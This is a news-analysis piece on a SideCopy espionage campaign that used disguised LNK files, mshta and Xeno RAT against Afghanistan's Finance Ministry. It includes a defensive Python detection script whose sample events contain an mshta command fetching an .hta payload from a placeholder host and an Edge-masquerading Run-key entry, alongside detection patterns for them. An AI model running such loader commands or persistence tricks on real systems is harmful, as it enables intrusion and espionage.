Pakistan Spies on Afghan Finance Ministry With Xeno RAT


Dark Reading, Jun 4, 2026


Why It Matters

The breach exposes sensitive fiscal data and underscores how regional rivals exploit Afghanistan’s under‑resourced cyber posture, raising the stakes for financial stability and diplomatic trust in South Asia.

Key Takeaways

  • SideCopy used spear‑phishing LNK files disguised as PDFs.
  • Xeno RAT payload hosted on Afghan Ministry of Communication domain.
  • Decoy staff directory targeted Pashto‑speaking finance officials.
  • Attack demonstrates Pakistan’s strategic cyber focus on Afghan fiscal data.
  • Afghanistan’s limited cyber resources increase espionage success risk.

Pulse Analysis

The recent SideCopy operation illustrates a textbook APT playbook, yet its execution is unusually precise for a mid‑tier threat. By delivering malicious LNK files disguised as PDFs, the group leveraged the mshta utility to fetch an HTA payload that loads the Xeno RAT in memory. Persistence is achieved through registry modifications that masquerade as a legitimate Microsoft Edge process, allowing the actors to maintain long‑term access to the Finance Ministry’s network while evading basic endpoint defenses.
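The two stages above (mshta pulling remote HTA content, and a Run-key entry dressed up as Microsoft Edge) are both visible in ordinary endpoint telemetry. The script below is an added detection example written for this page; it is not code from Dark Reading, SideCopy, or any vendor report. The event dictionaries, value names, URL and file paths are constructed for illustration (the only real paths are Edge's default install directories and the standard Run keys), and the field names mimic Sysmon-style process-creation and registry-value-set events only as an assumption.

```python
"""Detection sketch for two SideCopy-style stages described in the article:
(1) mshta.exe launched with a remote URL or .hta argument, and
(2) a Run-key persistence value named like Microsoft Edge whose target
    lives outside Edge's real install directory.

All sample events are CONSTRUCTED; field names are assumptions loosely
modelled on Sysmon event IDs 1 (process create) and 13 (registry value set).
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Default Edge install locations on Windows (real paths, compared lower-cased).
EDGE_DIRS = (
    r"c:\program files (x86)\microsoft\edge\application",
    r"c:\program files\microsoft\edge\application",
)
REMOTE_RE = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)
HTA_RE = re.compile(r"\.hta\b", re.IGNORECASE)
# Matches HKCU/HKLM ...\CurrentVersion\Run and \RunOnce keys.
RUN_KEY_RE = re.compile(
    r"\\software\\microsoft\\windows\\currentversion\\run(?:once)?$", re.IGNORECASE
)


@dataclass
class Finding:
    rule: str
    detail: str


def _exe_from_command(cmd: str) -> str:
    """Return the executable portion of a command line, handling quoted paths."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    return cmd.split(" ", 1)[0]


def check_process(ev: dict) -> Optional[Finding]:
    """Flag mshta.exe fetching remote content or running an .hta file."""
    image = ev.get("image", "").lower()
    if not image.endswith("\\mshta.exe"):
        return None
    cmd = ev.get("cmdline", "")
    if REMOTE_RE.search(cmd) or HTA_RE.search(cmd):
        return Finding(
            "mshta_remote_content",
            f"mshta spawned by {ev.get('parent_image')} with: {cmd}",
        )
    return None


def check_registry(ev: dict) -> Optional[Finding]:
    """Flag Run-key values that impersonate Edge or persist an mshta loader."""
    key = ev.get("key", "")
    if not RUN_KEY_RE.search(key):
        return None
    name = ev.get("value_name", "")
    exe = _exe_from_command(ev.get("data", "")).lower()
    if "edge" in name.lower() and not exe.startswith(EDGE_DIRS):
        return Finding("run_key_edge_masquerade", f"{key}\\{name} -> {exe}")
    if exe.endswith("\\mshta.exe") or exe in ("mshta", "mshta.exe"):
        return Finding("run_key_mshta", f"{key}\\{name} -> {exe}")
    return None


def scan(events: List[dict]) -> List[Finding]:
    """Run every event through the check matching its type."""
    findings = []
    for ev in events:
        check = check_process if ev.get("type") == "process" else check_registry
        hit = check(ev)
        if hit:
            findings.append(hit)
    return findings


# Constructed sample telemetry: one benign and one suspicious event per stage.
SAMPLE_EVENTS = [
    {"type": "process",
     "image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "cmdline": r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default',
     "parent_image": r"C:\Windows\explorer.exe"},
    {"type": "process",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe http://placeholder.invalid/directory.hta",  # constructed URL
     "parent_image": r"C:\Windows\explorer.exe"},
    {"type": "registry",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value_name": "Microsoft Edge",
     "data": r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window'},
    {"type": "registry",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value_name": "MicrosoftEdgeUpdate",  # hypothetical masquerading name
     "data": r'"C:\Users\Public\EdgeUpdate\msedge.exe"'},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.detail}")
```

Both heuristics are deliberately narrow: the registry rule keys on the name/path mismatch rather than on any specific value name, so it survives renaming, and the mshta rule fires on remote URLs or .hta arguments regardless of the parent process. In production, pair the Run-key check with the same logic on RunOnce, Winlogon and scheduled-task actions.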

Afghanistan’s digital footprint, built largely on foreign aid and post‑2001 infrastructure, now supports a sprawling array of ministry portals, email systems, and administrative services. However, the Taliban’s limited cybersecurity budget and talent pool leave critical systems exposed. The use of a compromised domain within the Ministry of Communication’s IP space demonstrates how attackers can piggyback on sovereign infrastructure to blend malicious traffic with legitimate government communications, complicating detection for a nation already struggling with isolation and scarce international cyber partnerships.

Regionally, the campaign signals a sharpening of cyber rivalry between Pakistan and Afghanistan, where financial intelligence is a high‑value target. For policymakers, the incident underscores the urgency of bolstering cyber hygiene, establishing robust threat‑sharing mechanisms, and investing in skilled cybersecurity personnel. As neighboring states continue to weaponize open‑source tools like Xeno RAT, Afghanistan’s ability to safeguard fiscal data will hinge on coordinated international assistance and a strategic overhaul of its cyber defense architecture.

